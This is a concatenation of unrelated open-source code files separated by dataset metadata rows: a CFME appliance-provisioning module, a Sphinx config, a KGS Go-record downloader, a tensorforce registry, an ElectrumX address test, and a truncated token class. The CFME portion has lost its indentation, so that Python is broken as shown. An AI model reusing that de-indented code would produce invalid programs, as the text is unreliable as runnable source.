self.fix_ntp_clock(log_callback=log_callback)
if self.is_downstream:
# Upstream already has one.
if kwargs.get('db_address') is None:
# This is workaround for appliances to use only one disk for the VMDB
# If they have been provisioned with a second disk in the infra,
# 'self.unpartitioned_disks' should exist and therefore this won't run.
if not self.unpartitioned_disks:
self.db.create_db_lvm()
self.db.enable_internal(
region, key_address, db_password, ssh_password)
else:
self.db.enable_external(
db_address, region, db_name, db_username, db_password)
self.wait_for_web_ui(timeout=1800, log_callback=log_callback)
if kwargs.get('loosen_pgssl', True) is True:
self.db.loosen_pgssl()
name_to_set = kwargs.get('name_to_set')
if name_to_set is not None and name_to_set != self.name:
self.rename(name_to_set)
self.restart_evm_service(log_callback=log_callback)
self.wait_for_web_ui(log_callback=log_callback)
# Set fqdn for openstack appliance
# If hostname is IP or resolvable, try hostname lookup and set it
# Example lookups with self.hostname as IP and self.hostname as resolvable name
# [root@host-192-168-55-85 ~]# host 1.2.3.137
# 137.3.2.1.in-addr.arpa domain name pointer 137.test.miq.com.
# [root@host-192-168-55-85 ~]# host 137.test.miq.com
# 137.test.miq.com has address 1.2.3.137
if on_openstack:
host_out = self.ssh_client.run_command('host {}'.format(self.hostname))
if host_out.success and 'domain name pointer' in host_out.output:
# resolvable and reverse lookup
fqdn = host_out.output.split(' ')[-1].rstrip('.')
elif host_out.success and 'has address' in host_out.output:
# resolvable and address returned
fqdn = self.hostname
else:
# not resolvable, don't set
fqdn = None
if fqdn:
self.appliance_console_cli.set_hostname(fqdn)
@logger_wrap("Configure Appliance: {}")
def configure(self, setup_fleece=False, log_callback=None, **kwargs):
"""Configures appliance - database setup, rename, ntp sync
Utility method to make things easier.
Args:
db_address: Address of external database if set, internal database if ``None``
(default ``None``)
name_to_set: Name to set the appliance name to if not ``None`` (default ``None``)
region: Number to assign to region (default ``0``)
fix_ntp_clock: Fixes appliance time if ``True`` (default ``True``)
loosen_pgssl: Loosens postgres connections if ``True`` (default ``True``)
key_address: Fetch encryption key from this address if set, generate a new key if
``None`` (default ``None``)
"""
log_callback("Configuring appliance {} on {}".format(self.vm_name, self.provider_key))
if kwargs:
with self:
self._custom_configure(**kwargs)
else:
# Defer to the IPAppliance.
super(Appliance, self).configure(log_callback=log_callback)
# And do configure the fleecing if requested
if setup_fleece:
self.configure_fleecing(log_callback=log_callback)
@logger_wrap("Configure fleecing: {}")
def configure_fleecing(self, log_callback=None):
with self(browser_steal=True):
if self.is_on_vsphere:
self.install_vddk(reboot=True, log_callback=log_callback)
self.wait_for_web_ui(log_callback=log_callback)
if self.is_on_rhev:
self.add_rhev_direct_lun_disk()
log_callback('Enabling smart proxy role...')
roles = self.server.settings.server_roles_db
if not roles["smartproxy"]:
self.server.settings.enable_server_roles("smartproxy")
# add provider
log_callback('Setting up provider...')
self.provider.setup()
# credential hosts
log_callback('Credentialing hosts...')
if not RUNNING_UNDER_SPROUT:
from cfme.utils.hosts import setup_providers_hosts_credentials
setup_providers_hosts_credentials(self.provider_key, ignore_errors=True)
# if rhev, set relationship
if self.is_on_rhev:
from cfme.infrastructure.virtual_machines import InfraVm
log_callback('Setting up CFME VM relationship...')
from cfme.common.vm import VM
from cfme.utils.providers import get_crud
vm = VM.factory(self.vm_name, get_crud(self.provider_key))
cfme_rel = InfraVm.CfmeRelationship(vm)
cfme_rel.set_relationship(str(self.server.name), self.server.sid)
def does_vm_exist(self):
return self.provider.does_vm_exist(self.vm_name)
def rename(self, new_name):
"""Changes appliance name
Args:
new_name: Name to set
Note:
Database must be up and running and evm service must be (re)started afterwards
for the name change to take effect.
"""
vmdb_config = {'server': {'name': new_name}}
self.update_advanced_settings(vmdb_config)
self.name = new_name
def destroy(self):
"""Destroys the VM this appliance is running as
"""
if self.is_on_rhev:
# if rhev, try to remove direct_lun just in case it is detach
self.remove_rhev_direct_lun_disk()
self.provider.delete_vm(self.vm_name)
def stop(self):
"""Stops the VM this appliance is running as
"""
self.provider.stop_vm(self.vm_name)
self.provider.wait_vm_stopped(self.vm_name)
def start(self):
"""Starts the VM this appliance is running as
"""
self.provider.start_vm(self.vm_name)
self.provider.wait_vm_running(self.vm_name)
def templatize(self, seal=True):
"""Marks the appliance as a template. Destroys the original VM in the process.
By default it runs the sealing process. If you have done it differently, you can opt out.
Args:
seal: Whether to run the sealing process (making the VM 'universal').
"""
if seal:
if not self.is_running:
self.start()
self.seal_for_templatizing()
self.stop()
else:
if self.is_running:
self.stop()
self.provider.mark_as_template(self.vm_name)
@property
def is_running(self):
return self.provider.is_vm_running(self.vm_name)
@property
def is_on_rhev(self):
from cfme.infrastructure.provider.rhevm import RHEVMProvider
return isinstance(self.provider, RHEVMProvider.mgmt_class)
@property
def is_on_vsphere(self):
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
return isinstance(self.provider, VMwareProvider.mgmt_class)
def add_rhev_direct_lun_disk(self, log_callback=None):
if log_callback is None:
log_callback = logger.info
if not self.is_on_rhev:
log_callback("appliance NOT on rhev, unable to connect direct_lun")
raise ApplianceException("appliance NOT on rhev, unable to connect direct_lun")
log_callback('Adding RHEV direct_lun hook...')
self.wait_for_ssh()
try:
self.provider.connect_direct_lun_to_appliance(self.vm_name, False)
except Exception as e:
log_callback("Appliance {} failed to connect RHEV direct LUN.".format(self.vm_name))
log_callback(str(e))
raise
@logger_wrap("Remove RHEV LUN: {}")
def remove_rhev_direct_lun_disk(self, log_callback=None):
if not self.is_on_rhev:
msg = "appliance {} NOT on rhev, unable to disconnect direct_lun".format(self.vm_name)
log_callback(msg)
raise ApplianceException(msg)
log_callback('Removing RHEV direct_lun hook...')
self.wait_for_ssh()
try:
self.provider.connect_direct_lun_to_appliance(self.vm_name, True)
except Exception as e:
log_callback("Appliance {} failed to connect RHEV direct LUN.".format(self.vm_name))
log_callback(str(e))
raise
def provision_appliance(version=None, vm_name_prefix='cfme', template=None, provider_name=None,
vm_name=None):
"""Provisions fresh, unconfigured appliance of a specific version
Note:
Version must be mapped to template name under ``appliance_provisioning > versions``
in ``cfme_data.yaml``.
If no matching template for given version is found, and trackerbot is set up,
the latest available template of the same stream will be used.
E.g.: if there is no template for 5.5.5.1 but there is 5.5.5.3, it will be used instead.
If both template name and version are specified, template name takes priority.
Args:
version: version of appliance to provision
vm_name_prefix: name prefix to use when deploying the appliance vm
Returns: Unconfigured appliance; instance of :py:class:`Appliance`
Usage:
my_appliance = provision_appliance('5.5.1.8', 'my_tests')
my_appliance.fix_ntp_clock()
...other configuration...
my_appliance.db.enable_internal()
my_appliance.wait_for_web_ui()
or
my_appliance = provision_appliance('5.5.1.8', 'my_tests')
my_appliance.configure()
"""
def _generate_vm_name():
if version is not None:
version_digits = ''.join([letter for letter in version if letter.isdigit()])
return '{}_{}_{}'.format(
vm_name_prefix, version_digits, fauxfactory.gen_alphanumeric(8))
else:
return '{}_{}'.format(vm_name_prefix, fauxfactory.gen_alphanumeric(8))
def _get_latest_template():
from cfme.utils import trackerbot
api = trackerbot.api()
stream = get_stream(version)
template_data = trackerbot.latest_template(api, stream, provider_name)
return template_data.get('latest_template')
if provider_name is None:
provider_name = conf.cfme_data.get('appliance_provisioning', {})['default_provider']
if template is not None:
template_name = template
elif version is not None:
templates_by_version = conf.cfme_data.get('appliance_provisioning', {}).get('versions', {})
try:
template_name = templates_by_version[version]
except KeyError:
# We try to get the latest template from the same stream - if trackerbot is set up
if conf.env.get('trackerbot', {}):
template_name = _get_latest_template()
if not template_name:
raise ApplianceException('No template found for stream {} on provider {}'
.format(get_stream(version), provider_name))
logger.warning('No template found matching version %s, using %s instead.',
version, template_name)
else:
raise ApplianceException('No template found matching version {}'.format(version))
else:
raise ApplianceException('Either version or template name must be specified')
prov_data = conf.cfme_data.get('management_systems', {})[provider_name]
from cfme.utils.providers import get_mgmt
provider = get_mgmt(provider_name)
if not vm_name:
vm_name = _generate_vm_name()
deploy_args = {}
deploy_args['vm_name'] = vm_name
if prov_data['type'] == 'rhevm':
deploy_args['cluster'] = prov_data['default_cluster']
if prov_data["type"] == "virtualcenter":
if "allowed_datastores" in prov_data:
deploy_args["allowed_datastores"] = prov_data["allowed_datastores"]
provider.deploy_template(template_name, **deploy_args)
return Appliance(provider_name, vm_name)
class ApplianceStack(LocalStack):
def push(self, obj):
was_before = self.top
super(ApplianceStack, self).push(obj)
logger.info("Pushed appliance {} on stack (was {} before) ".format(
obj.hostname, getattr(was_before, 'hostname', 'empty')))
if obj.browser_steal:
from cfme.utils import browser
browser.start()
def pop(self):
was_before = super(ApplianceStack, self).pop()
current = self.top
logger.info(
"Popped appliance {} from the stack (now there is {})".format(
getattr(was_before, 'address', 'empty'),
getattr(current, 'address', 'empty')))
if getattr(was_before, 'browser_steal', False):
from cfme.utils import browser
browser.start()
return was_before
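# Editor's note: the stack backs the `current_appliance` proxy below; pushing
# an appliance with browser_steal set restarts the browser so UI sessions
# follow the appliance on top. Sketch (hypothetical appliance object):
#
#   stack.push(appliance)      # appliance becomes current_appliance
#   ...work against it...
#   stack.pop()                # the previous appliance is current again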
stack = ApplianceStack()
def load_appliances(appliance_list, global_kwargs):
"""Instantiate a list of appliances from configuration data.
Args:
appliance_list: List of dictionaries that contain parameters for :py:class:`IPAppliance`
global_kwargs: Arguments that will be defined for each appliances. Appliance can override.
Result:
List of :py:class:`IPAppliance`
"""
result = []
for idx, appliance_kwargs in enumerate(appliance_list):
kwargs = {}
kwargs.update(global_kwargs)
kwargs.update(appliance_kwargs)
if kwargs.pop('dummy', False):
result.append(DummyAppliance(**kwargs))
else:
mapping = IPAppliance.CONFIG_MAPPING
if not any(k in mapping for k in kwargs):
raise ValueError(
"No valid IPAppliance kwargs found in config for appliance #{}".format(idx)
)
appliance = IPAppliance(**{mapping[k]: v for k, v in kwargs.items() if k in mapping})
result.append(appliance)
return result
def _version_for_version_or_stream(version_or_stream, sprout_client=None):
if version_or_stream is attr.NOTHING:
return attr.fields(DummyAppliance).version.default
if isinstance(version_or_stream, Version):
return version_or_stream
assert isinstance(version_or_stream, six.string_types), version_or_stream
from cfme.test_framework.sprout.client import SproutClient
sprout_client = SproutClient.from_config() if sprout_client is None else sprout_client
if version_or_stream[0].isdigit(): # presume streams start with non-number
return Version(version_or_stream)
for version_str in sprout_client.available_cfme_versions():
version = Version(version_str)
if version.stream() == version_or_stream:
return version
raise LookupError(version_or_stream)
def collections_for_appliance(appliance):
from cfme.modeling.base import EntityCollections
return EntityCollections.for_appliance(appliance)
@attr.s
class DummyAppliance(object):
"""a dummy with minimal attribute set"""
hostname = 'DummyApplianceHostname'
browser_steal = False
version = attr.ib(default=Version('5.8.0'), convert=_version_for_version_or_stream)
is_downstream = True
is_pod = False
is_dev = False
build = 'missing :)'
managed_known_providers = []
collections = attr.ib(default=attr.Factory(collections_for_appliance, takes_self=True))
@classmethod
def from_config(cls, pytest_config):
version = pytest_config.getoption('--dummy-appliance-version')
return cls(version=(version or attr.NOTHING))
def set_session_timeout(self, *k):
pass
def find_appliance(obj, require=True):
if isinstance(obj, NavigatableMixin):
return obj.appliance
# duck type - either is the config of pytest, or holds it
config = getattr(obj, 'config', obj)
from cfme.test_framework.appliance import PLUGIN_KEY
holder = config.pluginmanager.get_plugin(PLUGIN_KEY)
if holder or require:
assert holder
return holder.held_appliance
def load_appliances_from_config(config):
"""
Instantiate IPAppliance objects based on data in ``appliances`` section of config.
    The ``config`` contains some global values and an ``appliances`` key which contains a list
    of dicts that have the same keys as ``IPAppliance.CONFIG_MAPPING``'s keys.
    The global values at the root of the dict have lower priority than the values in the
    appliance definitions themselves.
Args:
config: A dictionary with the configuration
"""
if 'appliances' not in config:
raise ValueError("Invalid config: missing an 'appliances' section")
appliances = config['appliances']
global_kwargs = {
k: config[k]
for k in IPAppliance.CONFIG_MAPPING.keys()
if k not in IPAppliance.CONFIG_NONGLOBAL and k in config}
return load_appliances(appliances, global_kwargs)
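# Editor's note: an illustrative config for the loader above; hostnames are
# made up, and this assumes the shown keys appear in IPAppliance.CONFIG_MAPPING:
#
#   config = {
#       'browser_steal': False,                              # global default
#       'appliances': [
#           {'hostname': '10.0.0.1'},
#           {'hostname': '10.0.0.2', 'browser_steal': True},  # overrides global
#       ],
#   }
#   appliances = load_appliances_from_config(config)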
class ApplianceSummoningWarning(Warning):
"""to ease filtering/erroring on magical appliance creation based on script vs code"""
def get_or_create_current_appliance():
if stack.top is None:
warnings.warn(
"magical creation of appliance objects has been deprecated,"
" please obtain a appliance object directly",
category=ApplianceSummoningWarning,
)
stack.push(load_appliances_from_config(conf.env)[0])
return stack.top
current_appliance = LocalProxy(get_or_create_current_appliance)
class _CurrentAppliance(object):
def __get__(self, instance, owner):
return get_or_create_current_appliance()
class NavigatableMixin(object):
"""NavigatableMixin ensures that an object can navigate properly
The NavigatableMixin object ensures that a Collection/Entity object inside the
framework has access to be able to **create** a Widgetastic View, and that it
has access to the browser.
Note: The browser access will have to change once proliferation of the Sentaku
system becomes common place
"""
@property
def browser(self):
return self.appliance.browser.widgetastic
def create_view(self, view_class, o=None, override=None):
o = o or self
if override is not None:
new_obj = copy(o)
new_obj.__dict__.update(override)
else:
new_obj = o
return self.appliance.browser.create_view(
view_class, additional_context={'object': new_obj})
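    # Editor's note: `override` shallow-copies the context object and patches
    # its attributes before the view is built; illustrative use (the view
    # class name is hypothetical):
    #
    #   view = entity.create_view(DetailsView, override={'name': 'temp-name'})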
class NavigatableDeprecationWarning(DeprecationWarning):
pass
warnings.simplefilter('ignore', NavigatableDeprecationWarning)
@removals.removed_class(
"Navigatable", message=("Navigatable is being deprecated in favour of using Collections "
"objects with the NavigatableMixin"),
category=NavigatableDeprecationWarning,
)
class Navigatable(NavigatableMixin):
appliance = _CurrentAppliance()
def __init__(self, appliance=None):
self.appliance = appliance or get_or_create_current_appliance()
class MiqImplementationContext(sentaku.ImplementationContext):
""" Our context for Sentaku"""
pass
| gpl-2.0 | -1,851,766,126,545,638,000 | 40.79212 | 100 | 0.596159 | false |
dvalters/HAIL-CAESAR | docs/source/conf.py | 1 | 10385 | # -*- coding: utf-8 -*-
#
# HAIL-CAESAR documentation build configuration file, created by
# sphinx-quickstart on Sun Jul 16 10:54:36 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
'sphinxcontrib.fulltoc'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'HAIL-CAESAR'
copyright = u'2017, Declan Valters'
author = u'Declan Valters'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
html_theme_options = {
'logo': 'images/flood_depth_fig_crop.png',
'github_user': 'dvalters',
'github_repo': 'HAIL-CAESAR',
'github_button': 'true',
'github_banner': 'true'
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'HAIL-CAESAR v1.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'HAIL-CAESARdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'HAIL-CAESAR.tex', u'HAIL-CAESAR Documentation',
u'Declan Valters', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'hail-caesar', u'HAIL-CAESAR Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'HAIL-CAESAR', u'HAIL-CAESAR Documentation',
author, 'HAIL-CAESAR', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| gpl-3.0 | 6,752,765,516,872,856,000 | 27.767313 | 80 | 0.689937 | false |
maxpumperla/betago | betago/dataloader/index_processor.py | 1 | 4131 | # This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import print_function
from __future__ import absolute_import
import os
import sys
import multiprocessing
import six
if sys.version_info[0] == 3:
from urllib.request import urlopen, urlretrieve
else:
from urllib import urlopen, urlretrieve
def worker(url_and_target):
'''
Parallelize data download via multiprocessing
'''
try:
(url, target_path) = url_and_target
print('>>> Downloading ' + target_path)
urlretrieve(url, target_path)
except (KeyboardInterrupt, SystemExit):
print('>>> Exiting child process')
class KGSIndex(object):
def __init__(self,
kgs_url='http://u-go.net/gamerecords/',
index_page='kgs_index.html',
data_directory='data'):
'''
Create an index of zip files containing SGF data of actual Go Games on KGS.
Parameters:
-----------
kgs_url: URL with links to zip files of games
index_page: Name of local html file of kgs_url
data_directory: name of directory relative to current path to store SGF data
'''
self.kgs_url = kgs_url
self.index_page = index_page
self.data_directory = data_directory
self.file_info = []
self.urls = []
self.load_index() # Load index on creation
def download_files(self):
'''
Download zip files by distributing work on all available CPUs
'''
if not os.path.isdir(self.data_directory):
os.makedirs(self.data_directory)
urls_to_download = []
for file_info in self.file_info:
url = file_info['url']
file_name = file_info['filename']
if not os.path.isfile(self.data_directory + '/' + file_name):
urls_to_download.append((url, self.data_directory + '/' + file_name))
cores = multiprocessing.cpu_count()
pool = multiprocessing.Pool(processes=cores)
try:
it = pool.imap(worker, urls_to_download)
for i in it:
pass
pool.close()
pool.join()
except KeyboardInterrupt:
print(">>> Caught KeyboardInterrupt, terminating workers")
pool.terminate()
pool.join()
sys.exit(-1)
def create_index_page(self):
'''
If there is no local html containing links to files, create one.
'''
if os.path.isfile(self.index_page):
print('>>> Reading cached index page')
index_file = open(self.index_page, 'r')
index_contents = index_file.read()
index_file.close()
else:
print('>>> Downloading index page')
fp = urlopen(self.kgs_url)
data = six.text_type(fp.read())
fp.close()
index_contents = data
index_file = open(self.index_page, 'w')
index_file.write(index_contents)
index_file.close()
return index_contents
def load_index(self):
'''
Create the actual index representation from the previously downloaded or cached html.
'''
index_contents = self.create_index_page()
split_page = [item for item in index_contents.split('<a href="') if item.startswith("https://")]
for item in split_page:
download_url = item.split('">Download')[0]
if download_url.endswith('.tar.gz'):
self.urls.append(download_url)
for url in self.urls:
filename = os.path.basename(url)
split_file_name = filename.split('-')
num_games = int(split_file_name[len(split_file_name) - 2])
print(filename + ' ' + str(num_games))
self.file_info.append({'url': url, 'filename': filename, 'num_games': num_games})
if __name__ == '__main__':
index = KGSIndex()
index.download_files()
| mit | -410,448,613,732,599,400 | 34.307692 | 104 | 0.575163 | false |
reinforceio/tensorforce | tensorforce/core/objectives/__init__.py | 1 | 1414 | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from functools import partial
from tensorforce.core.objectives.objective import Objective
from tensorforce.core.objectives.deterministic_policy_gradient import DeterministicPolicyGradient
from tensorforce.core.objectives.plus import Plus
from tensorforce.core.objectives.policy_gradient import PolicyGradient
from tensorforce.core.objectives.value import Value
objective_modules = dict(
action_value=partial(Value, value='action'),
deterministic_policy_gradient=DeterministicPolicyGradient, plus=Plus,
policy_gradient=PolicyGradient, state_value=partial(Value, value='state'), value=Value
)
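# Editor's note: a hedged illustration of how this registry is typically
# consumed -- a spec name is looked up and the class instantiated; the actual
# call site lives elsewhere in the framework's module system:
#
#   objective_cls = objective_modules['policy_gradient']
#   # objective = objective_cls(...)  # arguments supplied by the module system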
__all__ = [
'DeterministicPolicyGradient', 'Objective', 'objective_modules', 'Plus', 'PolicyGradient',
'Value'
]
| apache-2.0 | 7,275,374,175,043,447,000 | 38.277778 | 97 | 0.738331 | false |
Groestlcoin/electrumx-grs | tests/lib/test_addresses.py | 1 | 2130 | # Copyright (c) 2017, the ElectrumX authors
#
# All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# and warranty status of this software.
import pytest
from lib.coins import Groestlcoin
from lib.hash import Base58
addresses = [
(Groestlcoin, "FY7vmDL7FZGACwqVNx5p4fVaGghojWM5AF",
"206168f5322583ff37f8e55665a4789ae8963532", "b8cb80b26e8932f5b12a7e"),
]
@pytest.fixture(params=addresses)
def address(request):
return request.param
def test_address_to_hashX(address):
coin, addr, _, hashX = address
assert coin.address_to_hashX(addr).hex() == hashX
def test_address_from_hash160(address):
coin, addr, hash, _ = address
raw = coin.DECODE_CHECK(addr)
verlen = len(raw) - 20
assert verlen > 0
verbyte, hash_bytes = raw[:verlen], raw[verlen:]
if coin.P2PKH_VERBYTE == verbyte:
assert coin.P2PKH_address_from_hash160(bytes.fromhex(hash)) == addr
elif verbyte in coin.P2SH_VERBYTES:
assert coin.P2SH_address_from_hash160(bytes.fromhex(hash)) == addr
else:
raise Exception("Unknown version byte")
| mit | -5,922,166,777,629,881,000 | 34.5 | 75 | 0.741315 | false |
fnl/libfnl | src/fnl/text/token_new.py | 1 | 6670 | """
.. py:module:: fnl.text.token
:synopsis: A tuple structure to hold token metadata.
.. moduleauthor:: Florian Leitner <[email protected]>
.. License: GNU Affero GPL v3 (http://www.gnu.org/licenses/agpl.html)
"""
from operator import itemgetter, methodcaller
from fn import _
from fn.monad import optionable
class token(tuple):
"""
A data structure for tokens.
Provides some additional introspection methods about the token's tags (``...Is...``).
Tokens have the following attributes:
1. ``text`` - the text object containing this token
1. ``namespace`` - the namespace for this token (e.g., the URI of the tokenizer used)
1. ``offset`` - the offset of the token in its containing string (e.g., ``(10, 15)``)
1. ``norm`` - a normalized form of the token (i.e., its stem or lemma)
1. ``ortho`` - a regular representation of the token's orthographic features
1. ``pos`` - the PoS tag (e.g., 'NNS')
1. ``chunk`` - the chunk tag in BIO-notation (e.g., 'B-NP')
1. ``entity`` - the entity tag in BIO-notation (e.g., 'I-gene')
1. ``word`` - the actual token string
1. ``begin`` - the begin postion (inclusive) of this token in the text
1. ``end`` - the end postion (exclusive) of this token in the text
The first three attributes (text, ns, and offset) are required, the last three properties
(word, begin, end) are inferred. All other attributes are optional **tags** on this token and
are returned as `Option` values.
"""
__slots__ = ()
_optional = ('norm', 'ortho', 'pos', 'chunk', 'entity')
def __new__(cls, txt, *ns_off, **tags):
"""
Create a new token.
A new token can either be created from a single object that can be evaluate to a tuple
of length of the number of required attributes and optional tags or by providing the
required attributes plus any optional tags (as keywords or in order).
"""
if len(ns_off) == 0 and not isinstance(txt, str):
txt, namespace, offset, tags = cls.__copy(txt)
else:
txt, namespace, offset, tags = cls.__make(txt, ns_off, tags)
assert isinstance(txt, str)
